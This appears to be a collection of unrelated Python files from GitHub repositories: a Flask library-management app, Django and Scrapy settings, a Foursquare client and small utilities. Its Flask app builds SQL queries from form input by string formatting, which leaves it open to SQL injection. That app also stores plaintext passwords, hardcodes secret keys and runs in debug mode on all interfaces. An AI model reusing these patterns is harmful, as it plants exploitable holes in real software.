/api/schemas/fav.py
|
81444288d1f1d35effeb6886ffc593643337fe41
|
[] |
no_license
|
speeed131/FavImage
|
a545f65a1d95f371da4adeab5dade70ee178fc0c
|
fd5648b29bfba4c65402e603e3c96a88689dfa9f
|
refs/heads/main
| 2023-08-25T10:22:19.652152
| 2021-11-01T13:12:39
| 2021-11-01T13:12:39
| 397,822,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 402
|
py
|
from typing import Optional
from fastapi import FastAPI
from pydantic import BaseModel, Field
from api.schemas.images import Image
class FavoriteImage(Image):
user_id: int = Field(example=1)
class Config:
orm_mode = True
class FavoriteImageResponse(BaseModel):
id: int
class Config:
orm_mode = True
class DeleteFavoriteImageResponse(FavoriteImageResponse):
pass
|
[
"speeed131@gmail.com"
] |
speeed131@gmail.com
|
67af4b16e00a4fbacf0c0986c9e02028ec42c508
|
03965a2a2066e72201b73dbbd8151bad2d64bfe7
|
/main.py
|
0f2eccfdaac86e3f7c7d70060abd483fe6eea961
|
[] |
no_license
|
vsfh/Library-Management
|
1fb2692d0877dbae6db44ec8fb2e2a1cf90610ad
|
939361684d9877e9dc0face0ff278a663d1c6a79
|
refs/heads/master
| 2021-05-20T15:21:36.684613
| 2020-04-02T03:43:57
| 2020-04-02T03:43:57
| 252,347,346
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,239
|
py
|
from flask import Flask, render_template, request, flash, jsonify, redirect, url_for, session
from utils import query, map_student_course, recommed_module
from config import config
import json
import time
import numpy as np
import os
import cx_Oracle
# 创建flask对象
app = Flask(__name__)
app.config['SECRET_KEY'] = 'gsolvit'
@app.route('/index', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/manager', methods=['GET', 'POST'])
def manager():
sql = "select * from coder.lib_user"
result = query.query(sql)
return render_template('manager.html', result=result)
@app.route('/reader', methods=['GET', 'POST'])
def reader():
name = session.get('name')
sql = "select * from coder.borrowed where usr_id = ('%s')" % (name)
result = query.query(sql)
return render_template('reader.html', result=result)
@app.route('/bookList/?<string:bname>', methods=['GET', 'POST'])
def bookList(bname):
name = session.get('name')
sql = "select * from coder.book where bname = ('%s')" % (bname)
result = query.query(sql)
result2 = np.array(result)
result3 = []
for i in range(result2.shape[0]):
a = "../static/images/"+result2[i][0]+".jpg"
result3.append(a)
result3 = np.array(result3)
result2 = np.c_[result2,result3]
return render_template('bookList.html', result=result2)
@app.route('/bookSearch', methods=['GET', 'POST'])
def bookSearch():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'reader':
if request.method == 'GET':
#print('1111')
return render_template('bookSearch.html')
else:
#print('222')
bname = request.form.get('bname')
print(bname)
query.getImage(bname)
sql = "select * from coder.book where bname = ('%s')" % (bname)
result = query.query(sql)
return redirect(url_for('bookList',bname=bname))
else:
return u'页面不存在'
@app.route('/managerAdd', methods=['GET', 'POST'])
def managerAdd():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('managerAdd.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
usr_password = request.form.get('usr_password')
usr_type = request.form.get('usr_type')
sql="INSERT INTO coder.lib_user VALUES ('%s','%s','%s')" % (usr_id,usr_password,usr_type)
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/managerDelete', methods=['GET', 'POST'])
def managerDelete():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('managerDelete.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
sql="DELETE FROM coder.lib_user WHERE usr_id='%s'" % usr_id
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookBorrow', methods=['GET', 'POST'])
def bookBorrow():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookBorrow.html')
else:
#print('222')
usr_id = request.form.get('usr_id')
bid = request.form.get('bid')
return_date = request.form.get('return_date')
sql="INSERT INTO coder.borrowed VALUES ('%s','%s','%s')" % (usr_id,bid,return_date)
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookReturn', methods=['GET', 'POST'])
def bookReturn():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookReturn.html')
else:
#print('222')
bid = request.form.get('usr_id')
sql="DELETE FROM coder.borrowed WHERE bid='%s'" % bid
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookIn', methods=['GET', 'POST'])
def bookIn():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookIn.html')
else:
#print('222')
bname = request.form.get('bname')
bid = request.form.get('bid')
path = request.form.get('path')
query.blob(bid,bname,path)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/bookOut', methods=['GET', 'POST'])
def bookOut():
stu_id = session.get('stu_id')
#print(stu_id)
if stu_id == 'librarian':
if request.method == 'GET':
#print('1111')
return render_template('bookOut.html')
else:
#print('222')
bid = request.form.get('bid')
sql="DELETE FROM coder.book WHERE bid='%s'" % bid
#print(sql)
query.update(sql)
return redirect(url_for('manager'))
else:
return u'页面不存在'
@app.route('/course_discussion', methods=['GET', 'POST'])
def course_discussion():
if request.method == 'GET':
return render_template('course_discussion.html')
else:
topic = request.form.get('topic')
comments = request.form.get('comments')
#commenter = request.form.get('commenter')
# print(len(topic))
# print('course_discussion')
# print(topic, commenter, comments)
stu_id = session.get('stu_id')
sql = "select NAME from STUDENT where STU_NO = '%s'" % stu_id
stu_name = query.query(sql)
stu_name = stu_name[0][0]
now = time.time()
now = time.strftime('%Y-%m-%d', time.localtime(now))
now = str(now)
news_id = stu_name + now
sql = "INSERT INTO NEWS(TOPIC, COMMENTS, COMMENTER, NEWS_ID, IS_FIRST) VALUES ('%s', '%s', '%s', '%s', '0')" % (topic, comments, stu_name, news_id)
print(sql)
query.update(sql)
return redirect(url_for('news_center'))
@app.route('/', methods=['GET', 'POST'])
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method=='GET':
return render_template('login.html')
else:
stu_id = request.form.get('stu_id')
password = request.form.get('password')
if config['USER']=='librarian':
sql = "select * from coder.lib_user where usr_id = '%s'" % stu_id
result = query.query(sql)
else:
sql = "select * from coder.lib_user_view where usr_id = '%s'" % stu_id
result = query.query(sql)
print(result)
if len(result) != 0:
#print(result[0][6], password)
if (result[0][1] == password and result[0][2] == config['USER']):
session['name'] = result[0][0]
session['stu_id'] = result[0][2]
session.permanent=True
print(result[0][1])
if config['USER']=='librarian':
return redirect(url_for('manager'))
else:
return redirect(url_for('reader'))
else:
return u'账号或密码错误'
else:
return u'不存在这个用户'
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method=='GET':
return render_template('register.html')
else:
stu_id = request.form.get('stu_id')
user = request.form.get('user')
password = request.form.get('password')
password1 = request.form.get('password1')
print(stu_id, user, password, password1)
if(password1 != password):
return u'两次输入密码不同,请检查'
else:
sql = "select * from STUDENT where STU_NO = '%s'" % stu_id
#print(sql)
result = query.query(sql)
#print(result)
if len(result) == 0:
return u'没有这个用户了'
else:
if result[0][6] == user:
sql = "UPDATE student SET PASSWORD='%s' WHERE STU_NO='%s'" % (password, stu_id)
query.update(sql)
return redirect(url_for('login'))
else:
return u'密码错误'
@app.route('/news_center', methods=['GET', 'POST'])
def news_center():
sql = "select * from NEWS WHERE IS_FIRST='0'"
result = query.query(sql)
print(result)
return render_template('news_center.html', result=result)
@app.route('/detail/<question>', methods=['GET', 'POST'])
def detail(question):
print(question)
#question=str(question)
if request.method=='GET':
sql="SELECT TOPIC, COMMENTS, COMMENTER, CREATE_TIME FROM NEWS WHERE NEWS_ID='%s' AND IS_FIRST='0'" % question
title=query.query(sql)
#print(title)
title=title[0]
sql="SELECT * FROM NEWS WHERE IS_FIRST='%s'" % question
result=query.query(sql)
return render_template('detail.html', title=title, result=result)
else:
comments = request.form.get('comments')
stu_id = session.get('stu_id')
sql = "select NAME from STUDENT where STU_NO = '%s'" % stu_id
stu_name = query.query(sql)
stu_name = stu_name[0][0]
now = time.time()
now = time.strftime('%Y-%m-%d', time.localtime(now))
now = str(now)
news_id = stu_name + now
sql = "INSERT INTO NEWS(TOPIC, COMMENTS, COMMENTER, NEWS_ID, IS_FIRST) VALUES ('回复', '%s', '%s', '%s', '%s')" % (comments, stu_name, news_id,question)
print(sql)
query.update(sql)
sql = "SELECT TOPIC, COMMENTS, COMMENTER, CREATE_TIME FROM NEWS WHERE NEWS_ID='%s' AND IS_FIRST='0'" % question
title = query.query(sql)
# print(title)
title = title[0]
sql = "SELECT * FROM NEWS WHERE IS_FIRST='%s'" % question
result = query.query(sql)
return render_template('detail.html', title=title, result=result)
@app.route('/recommed', methods=['GET', 'POST'])
def recommed():
return render_template('recommed.html')
@app.route("/getRecommedData", methods=['GET','POST'])
def getRecommedData():
stu_no = session.get('stu_id')
id2Student, id2Course, stuNo2MatId = map_student_course.get_map_student()
scoreMatrix = map_student_course.get_matrix(id2Student)
"""
函数,recommedCourse:使用SVD进行课程推荐:
返回:(课程1ID, 课程1评分)
"""
topNCourse, topNStudent = recommed_module.recommedCoursePerson(scoreMatrix, stuNo2MatId[stu_no], N=20)
"""
将得到的Course与Person装换为前端图标需要的json格式:
{
"source": [
[2.3, "计算机视觉"],
[1.1, "自然语言处理"],
[2.4, "高等数学"],
[3.1, "线性代数"],
[4.7, "计算机网络"],
[5.1, "离散数学"]
]
}
"""
id2Student = {i:id2Student[i][0] for i in id2Student.keys()}
print(id2Student)
print(id2Course)
courseJson = recommed_module.toBarJson(topNCourse, id2Course)
personJson = recommed_module.toBarJson(topNStudent, id2Student)
courseJson = recommed_module.regularData(courseJson, 1, 5)
personJson = recommed_module.regularData(personJson, 0, 1)
coursePersonJson = {}
coursePersonJson['course'] = courseJson
coursePersonJson['person'] = personJson
return jsonify(coursePersonJson)
@app.route('/personal_information', methods=['GET', 'POST'])
def personal_information():
"""
功能(个人中心界面): 根据"stu_id"从数据库中得到学生基本信息,用于个人中心信息显示
:return:
"""
stu_no = session.get('stu_id')
print(stu_no + ' is stu_no')
sql = "SELECT * FROM student WHERE STU_NO = '%s'" % stu_no
result = query.query(sql)
return render_template('personal_information.html', result=result)
@app.route('/train_plan', methods=['GET', 'POST'])
def train_plan():
return render_template('train_plan.html')
@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
"""
功能(培养计划界面): 初始进入培养计划界面,根据stu_id从数据库中得到数据并将其转换为计划树所需json格式数据
:return: planTree:(json) 计划树所需数据
"""
stu_id = session.get('stu_id')
planTree = query.getPlanTreeJson(stu_id)
print(planTree)
return jsonify(planTree)
@app.route('/submit_train_plan', methods=['GET', 'POST'])
def submit_train_place():
"""
功能1:实现数据库学生选课信息的更新
功能2: 实现计划树以及进度条的提交更新。
:return:
"""
"""功能1:"""
twoData = request.get_json(force=True)
train_plan = twoData['tree']
scores = twoData['scores']
#train_plan['name'] = "数据转换成功"
print('反馈回来的数据是:')
print(train_plan)
data = train_plan['children']
array_finish = [0]*120
#print(array_finish)
for data_children in data:
data_children = data_children['children']
#print(data_children)
for data_children_child_1 in data_children:
#print('data_children_child', data_children_child)
data_children_child_1 = data_children_child_1['children']
for data_children_child in data_children_child_1:
name = data_children_child['children'][0]['name']
color = data_children_child['children'][0]['itemStyle']['borderColor']
#print(name, color)
sql = "select CO_100 from education_plan WHERE CO_NAME='%s'" % name
co_100 = query.query(sql)
co_100 = co_100[0][0]
if color == 'red':
array_finish[int(co_100)] = 0
else:
array_finish[int(co_100)] = 1
finish_co = ''
for i in range(1, 119):
if array_finish[i] == 1:
finish_co += '1'
else:
finish_co += '0'
print(finish_co)
#print(array_finish)
stu_id = session.get('stu_id')
query.updateDatabase(stu_id, train_plan)
query.updateScore(stu_id, scores)
"""功能2:"""
train_plan_str = json.dumps(train_plan)
train_plan_str = train_plan_str.replace("yellow", "green")
train_plan = json.loads(train_plan_str)
return jsonify(train_plan)
if __name__ == '__main__':
app.run("0.0.0.0", debug=True)
|
[
"508178817@qq.com"
] |
508178817@qq.com
|
98be3bc8b64729359909a13f9c2c0dd6984bcf8f
|
294f244e6b671f0ce9d9f5232644d9f6ae62d95e
|
/blog/urls.py
|
d977e87bb348c79d38be5db7ab50be273a4b128b
|
[] |
no_license
|
hagahiro/django-framework-study
|
c38d624f09f251a05b3871e4fd01da6d1fd13db0
|
7643b964a4b1d25b694b3f0c1072ae10d55ef0f7
|
refs/heads/master
| 2023-06-19T10:05:57.564401
| 2021-07-16T13:27:28
| 2021-07-16T13:27:28
| 386,646,641
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 377
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path("", views.Index.as_view(), name = "index"),
path("detail/<pk>/", views.Detail.as_view(), name="detail"),
path("create/", views.Create.as_view(), name="create"),
path("update/<pk>", views.Update.as_view(), name="update"),
path("delete/<pk>", views.Delete.as_view(), name="delete")]
|
[
"you@example.com"
] |
you@example.com
|
83db18db2c0810886caf6d42ca2fd18c0b571e8a
|
086973e0c9db0e92f44e2c30bf9183a28320d9b9
|
/Sprint2Experimento/wsgi.py
|
b4d2b899d648306121785661029ddb0e94a1c650
|
[] |
no_license
|
afsanchezr1/Sprint2Experimento
|
b48646492243bd0ba8ab7e3bd5ccc0c11088a25f
|
4ddbc8fbcbf335171c8fa314a5f108a257f2dbe3
|
refs/heads/master
| 2022-12-19T22:14:37.314194
| 2020-10-02T03:51:50
| 2020-10-02T03:51:50
| 300,455,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
"""
WSGI config for Sprint2Experimento project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Sprint2Experimento.settings')
application = get_wsgi_application()
|
[
"afsanchezr1@uniandes.edu.co"
] |
afsanchezr1@uniandes.edu.co
|
6df85996bb86e919549a37c35b69b6c190d39ed6
|
745ca0b2c95f9a0ca4f492fbe71750d311c0f782
|
/scrape/scrape/settings.py
|
2a94c322a3679e475c2b7e1f4bf5c45f5bb48cc6
|
[] |
no_license
|
RNSAINJU/fpl
|
930a2f65c46a5d9c8668dccc4707d3be72e3c6ac
|
c9e6734db04a3ee55605f102751604beae1db3b9
|
refs/heads/master
| 2022-12-14T11:54:55.820823
| 2020-09-16T07:57:07
| 2020-09-16T07:57:07
| 295,941,256
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,172
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for scrape project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'scrape'
SPIDER_MODULES = ['scrape.spiders']
NEWSPIDER_MODULE = 'scrape.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scrape (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'scrape.middlewares.ScrapeSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'scrape.middlewares.ScrapeDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'scrape.pipelines.ScrapePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"aryan.sainju@gmail.com"
] |
aryan.sainju@gmail.com
|
740c66022712b423c6063a8d4b4c4832f485043d
|
a5904e66bdbc211619596b88e30e6dd8b36ccbb5
|
/data_types/data2D.py
|
36a6f90383467d9d8033c44d7e346209270cb7ef
|
[
"MIT"
] |
permissive
|
Vrekrer/magdynlab
|
beee86775649f8f0aea67ca9bac17fc54937b6d8
|
f5149d3213a37c7c18f39876c3e2367fc7deb9e8
|
refs/heads/master
| 2021-06-10T16:29:41.467864
| 2021-01-15T05:49:18
| 2021-01-15T05:49:18
| 91,998,778
| 10
| 4
| null | 2017-07-06T22:05:34
| 2017-05-22T01:15:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,469
|
py
|
# coding=utf-8
# Author: Diego González Chávez
# email : diegogch@cbpf.br / diego.gonzalez.chavez@gmail.com
#
# Data 2D
#
# TODO:
# Make documentation
import numpy
__all__ = ['Data2D']
class Data2D(object):
'''Data container for tabular data
By default only two columns are used
these can be accesed using X and Y properties
'''
def __init__(self):
self.reset()
self.header = None
self.fmt = 'txt'
self.str_fmt = '%.6E'
self.reset()
def reset(self, n=2):
self.dat = numpy.array([numpy.zeros((n)) * numpy.NaN])
def addPoint(self, *values):
pt = numpy.array(list(values))
if not numpy.any(numpy.isfinite(self.dat)):
self.dat[0] = pt
else:
self.dat = numpy.append(self.dat, [pt], axis=0)
def save(self, fileName):
if self.header is None:
numpy.savetxt(fileName, self.dat, fmt=self.str_fmt)
else:
numpy.savetxt(fileName, self.dat,
fmt=self.str_fmt, header=self.header)
# TODO implement npy saves
def load(self, fileName):
if self.header is None:
sr = 0
else:
sr = self.header.count('\n') + 1
self.dat = numpy.loadtxt(fileName, skiprows=sr)
# TODO implement npy loads
@property
def X(self):
return self.dat[:, 0]
@property
def Y(self):
return self.dat[:, 1]
|
[
"diego.gonzalez.chavez@gmail.com"
] |
diego.gonzalez.chavez@gmail.com
|
da0fb435b2d15e90a57a23a000e23fda811be8ea
|
d20267e921888435d22442fe6275b6eca9f74307
|
/tests/settings.py
|
1ed61af3fa10d2f67732553692fb6cf43e38da0a
|
[
"MIT"
] |
permissive
|
ELDAELRA/djangocms_slick_slider
|
d72b96a27761dde3c4035cd308a94f22c5647559
|
57678d45b262083df5eeee2b88c2eee93699f064
|
refs/heads/master
| 2020-04-28T21:48:28.215464
| 2020-03-18T11:06:10
| 2020-03-18T13:58:53
| 175,595,458
| 0
| 0
|
MIT
| 2019-03-14T10:03:03
| 2019-03-14T10:03:02
| null |
UTF-8
|
Python
| false
| false
| 5,080
|
py
|
import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for example project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%3sxux49)lr(y73zylv88#wkg47tm$puw-#p7%1xmcj$4xyvkb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'de'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
STATIC_ROOT = os.path.join(DATA_DIR, 'static')
SITE_ID = 1
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.i18n',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.template.context_processors.csrf',
'django.template.context_processors.tz',
'sekizai.context_processors.sekizai',
'django.template.context_processors.static',
'cms.context_processors.cms_settings'
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader'
],
},
},
]
MIDDLEWARE_CLASSES = (
'cms.middleware.utils.ApphookReloadMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
'cms.middleware.page.CurrentPageMiddleware',
'cms.middleware.toolbar.ToolbarMiddleware',
'cms.middleware.language.LanguageCookieMiddleware'
)
INSTALLED_APPS = (
'djangocms_admin_style',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'django.contrib.messages',
'cms',
'menus',
'sekizai',
'treebeard',
'djangocms_text_ckeditor',
'filer',
'easy_thumbnails',
'djangocms_column',
'djangocms_link',
'cmsplugin_filer_file',
'cmsplugin_filer_folder',
'cmsplugin_filer_image',
'cmsplugin_filer_utils',
'djangocms_style',
'djangocms_snippet',
'djangocms_googlemap',
'djangocms_video',
'djangocms_slick_slider',
)
LANGUAGES = (
## Customize this
('de', gettext('de')),
)
CMS_LANGUAGES = {
## Customize this
'default': {
'public': True,
'hide_untranslated': False,
'redirect_on_fallback': True,
},
1: [
{
'public': True,
'code': 'de',
'hide_untranslated': False,
'name': gettext('de'),
'redirect_on_fallback': True,
},
],
}
CMS_TEMPLATES = (
## Customize this
('fullwidth.html', 'Fullwidth'),
('sidebar_left.html', 'Sidebar Left'),
('sidebar_right.html', 'Sidebar Right')
)
CMS_PERMISSION = True
CMS_PLACEHOLDER_CONF = {}
DATABASES = {
'default': {
'CONN_MAX_AGE': 0,
'ENGINE': 'django.db.backends.sqlite3',
'HOST': 'localhost',
'NAME': 'project.db',
'PASSWORD': '',
'PORT': '',
'USER': ''
}
}
MIGRATION_MODULES = {
}
THUMBNAIL_PROCESSORS = (
'easy_thumbnails.processors.colorspace',
'easy_thumbnails.processors.autocrop',
'filer.thumbnail_processors.scale_and_crop_with_subject_location',
'easy_thumbnails.processors.filters'
)
|
[
"o.sahin@oesah.de"
] |
o.sahin@oesah.de
|
65ebfe4663a3341f1b8068cfbc4828dcf225ac50
|
e8c65be05e771c74d6d389b9d2123aacbdb5cdbe
|
/clover/controller/bars_controller.py
|
a9f06777a8c647acfdf53d86b18c392f35873f7d
|
[] |
no_license
|
reDim89/cloverAPI
|
c79996db332a546f173102b52f24f969a196af8c
|
d249caae93f7e9c01160e2357a9b6cfbed51421b
|
refs/heads/master
| 2022-12-16T19:27:01.705760
| 2019-01-01T07:41:37
| 2019-01-01T07:41:37
| 140,020,086
| 0
| 0
| null | 2022-12-08T01:16:41
| 2018-07-06T18:53:07
|
Python
|
UTF-8
|
Python
| false
| false
| 4,185
|
py
|
import requests
import configparser
import json
from collections import OrderedDict
config = configparser.ConfigParser()
config.read('settings.ini')
class Bars_controller:
def __init__(self):
self._client_id = config['FOURSQUARE']['CLIENT_ID']
self._client_secret = config['FOURSQUARE']['CLIENT_SECRET']
self._section = 'drinks'
self._base_url = 'https://api.foursquare.com/v2/venues/'
self._version = '20181103'
def _get_bars(self, limit, ll):
payload = {'client_id': self._client_id,
'client_secret': self._client_secret,
'v': self._version,
'll': str(ll),
'section': self._section,
'limit': limit
}
self._response = requests.get(self._base_url + 'explore',
params=payload)
return self._response.status_code
def _extract_bars_list(self, limit, ll):
self._get_bars(limit, ll)
try:
items_list = [item for item in self._response.json()
['response']
['groups']
[0]
['items']]
except KeyError:
print('Items are missing in API repsose')
return None
return items_list
def get_venues(self, limit, ll):
venues_list = []
try:
items_list = self._extract_bars_list(limit, ll)
except RuntimeError:
return None
for item in items_list:
try:
d = {'id': item['venue']['id'],
'name': item['venue']['name'],
'address': item['venue']['location']['address'],
'lat': item['venue']['location']['lat'],
'lng': item['venue']['location']['lng']}
except KeyError:
d = {'id': item['venue']['id'],
'name': item['venue']['name'],
'lat': item['venue']['location']['lat'],
'lng': item['venue']['location']['lng']}
venues_list.append(OrderedDict(sorted(d.items())))
return json.dumps(venues_list, ensure_ascii=False)
def get_venue_details(self, id):
payload = {'client_id': self._client_id,
'client_secret': self._client_secret,
'v': self._version,
}
# Запрос в FourSquare по id заведения
self._response = requests.get(self._base_url + id,
params=payload).json()['response']
venue_name = self._response['venue']['name']
# Обработка на случай, если нет фото
try:
photo_url = (self._response['venue']['bestPhoto']['prefix'] +
str(self._response['venue']['bestPhoto']['width']) + 'x' +
str(self._response['venue']['bestPhoto']['height']) +
self._response['venue']['bestPhoto']['suffix'])
except KeyError:
photo_url = 'No photo'
print('No photo for venue {0}'.format(venue_name))
# Обработка на случай, если нет описания
try:
venue_description = self._response['venue']['description']
except KeyError:
venue_description = 'No description'
print('No descritption for venue {0}'.format(venue_name))
# Обработка на случай, если нет урла
try:
venue_url = self._response['venue']['url']
except KeyError:
venue_url = 'No url'
print('No url for venue {0}'.format(venue_name))
venue_details = {'name': venue_name,
'description': venue_description,
'price': self._response['venue']['price']['tier'],
'photo': photo_url,
'url': venue_url
}
return json.dumps(venue_details, ensure_ascii=False)
|
[
"idmitat@gmail.com"
] |
idmitat@gmail.com
|
285b24a7eacfde3a0bff5e3f723f6864861e9aec
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02409/s375215076.py
|
48a6cc040f6684de780dec7af370123b59d63a1f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 501
|
py
|
import sys
official_house = {}
for b in range(1, 5):
for f in range(1, 4):
for r in range(1, 11):
official_house[(b, f, r)] = 0
n = int(sys.stdin.readline())
for line in sys.stdin:
(b, f, r, v) = [int(i) for i in line.split()]
official_house[(b, f, r)] += v
for b in range(1, 5):
if b != 1:
print("####################")
for f in range(1, 4):
for r in range(1, 11):
print(" %d" % official_house[(b, f, r)], end="")
print()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
187944515c8e933e6c9211a36f745186a56063bd
|
883f666c6a8afa30fd094b7054039c57755867c3
|
/slowfast/TrainSet.py
|
fb161c75adfce5fa925b0a5ce80a9b8d5ceb86fd
|
[] |
no_license
|
Yahiy/video_question_answer
|
ea59dc3eef9004012008054dd170c528740714bb
|
491ed94e63a059183c0cb8e03e35be763cf4eceb
|
refs/heads/master
| 2020-04-14T15:42:13.653835
| 2019-06-11T09:13:37
| 2019-06-11T09:13:37
| 163,935,142
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,677
|
py
|
from __future__ import absolute_import
import os
import numpy as np
import re
import h5py
from PIL import Image
import torch
from torchvision.transforms import transforms
from scribt.data_util import pad_video, pad_sequences
class TrainSet(object):
def __init__(self, dataset, hdf5_path, word_matrix, word2idx, ans2idx):
#, questions, word_embed,labels,root=None, transform=None):
super(TrainSet, self).__init__()
self.dataset = dataset
